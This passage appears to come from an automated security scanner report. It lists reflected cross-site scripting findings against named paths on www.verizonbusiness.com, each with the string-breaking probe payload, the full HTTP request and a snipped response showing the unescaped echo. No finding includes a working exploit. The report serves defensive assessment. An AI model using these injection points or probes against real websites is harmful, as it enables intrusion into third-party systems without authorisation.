This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions83a8b'%3b3d94583d9e2/bysolutions/ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:25 GMT
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions83a8b';3d94583d9e2/bysolutions/ucc/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.998. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/ucc/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8d6e"%3bbe532e843aa was submitted in the REST URL parameter 1. This input was echoed as c8d6e";be532e843aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsc8d6e"%3bbe532e843aa/bysolutions/ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsc8d6e";be532e843aa/bysolutions/ucc/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENT
...[SNIP]...

1.999. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/ucc/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8128"%3b021c737cbbf was submitted in the REST URL parameter 2. This input was echoed as b8128";021c737cbbf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsb8128"%3b021c737cbbf/ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:02 GMT
Content-Type: text/html
Content-Length: 41864
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutionsb8128";021c737cbbf/ucc/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.1000. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/ucc/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffc6a'%3b4bd27135e04 was submitted in the REST URL parameter 2. This input was echoed as ffc6a';4bd27135e04 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsffc6a'%3b4bd27135e04/ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41864
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsffc6a';4bd27135e04/ucc/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1001. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/ucc/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3abd9"%3bb3095a78cbe was submitted in the REST URL parameter 3. This input was echoed as 3abd9";b3095a78cbe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/ucc3abd9"%3bb3095a78cbe/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:42 GMT
Content-Type: text/html
Content-Length: 43088
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/ucc3abd9";b3095a78cbe/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1002. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/ucc/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78837'%3bd12377140db was submitted in the REST URL parameter 3. This input was echoed as 78837';d12377140db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/ucc78837'%3bd12377140db/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:08 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43086
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/ucc78837';d12377140db/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1003. http://www.verizonbusiness.com/solutions/education/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/education/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c80e'%3b723953db1db was submitted in the REST URL parameter 1. This input was echoed as 9c80e';723953db1db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions9c80e'%3b723953db1db/education/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:16 GMT
Content-Type: text/html
Content-Length: 40640
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions9c80e';723953db1db/education/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1004. http://www.verizonbusiness.com/solutions/education/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/education/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96e4a"%3b3a3155926ce was submitted in the REST URL parameter 1. This input was echoed as 96e4a";3a3155926ce in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions96e4a"%3b3a3155926ce/education/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40640
Date: Wed, 17 Nov 2010 00:36:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions96e4a";3a3155926ce/education/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.1005. http://www.verizonbusiness.com/solutions/education/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/education/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9363"%3bc0c6099cf49 was submitted in the REST URL parameter 2. This input was echoed as a9363";c0c6099cf49 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/educationa9363"%3bc0c6099cf49/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:47 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41850
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/educationa9363";c0c6099cf49/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1006. http://www.verizonbusiness.com/solutions/education/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/education/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab06a'%3bbbf745ee629 was submitted in the REST URL parameter 2. This input was echoed as ab06a';bbf745ee629 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/educationab06a'%3bbbf745ee629/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:04 GMT
Content-Type: text/html
Content-Length: 41850
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/educationab06a';bbf745ee629/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1007. http://www.verizonbusiness.com/solutions/finance/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/finance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5196d"%3b541edf6cdcf was submitted in the REST URL parameter 1. This input was echoed as 5196d";541edf6cdcf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions5196d"%3b541edf6cdcf/finance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40636
Date: Wed, 17 Nov 2010 00:36:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions5196d";541edf6cdcf/finance/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.1008. http://www.verizonbusiness.com/solutions/finance/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/finance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38c52'%3b6ed2c2aebca was submitted in the REST URL parameter 1. This input was echoed as 38c52';6ed2c2aebca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions38c52'%3b6ed2c2aebca/finance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:25 GMT
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions38c52';6ed2c2aebca/finance/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1009. http://www.verizonbusiness.com/solutions/finance/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/finance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2342c'%3b032c7f41c91 was submitted in the REST URL parameter 2. This input was echoed as 2342c';032c7f41c91 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/finance2342c'%3b032c7f41c91/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:49 GMT
Content-Type: text/html
Content-Length: 41848
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/finance2342c';032c7f41c91/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1010. http://www.verizonbusiness.com/solutions/finance/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/finance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef9de"%3b0da596ec1ba was submitted in the REST URL parameter 2. This input was echoed as ef9de";0da596ec1ba in the application's response.

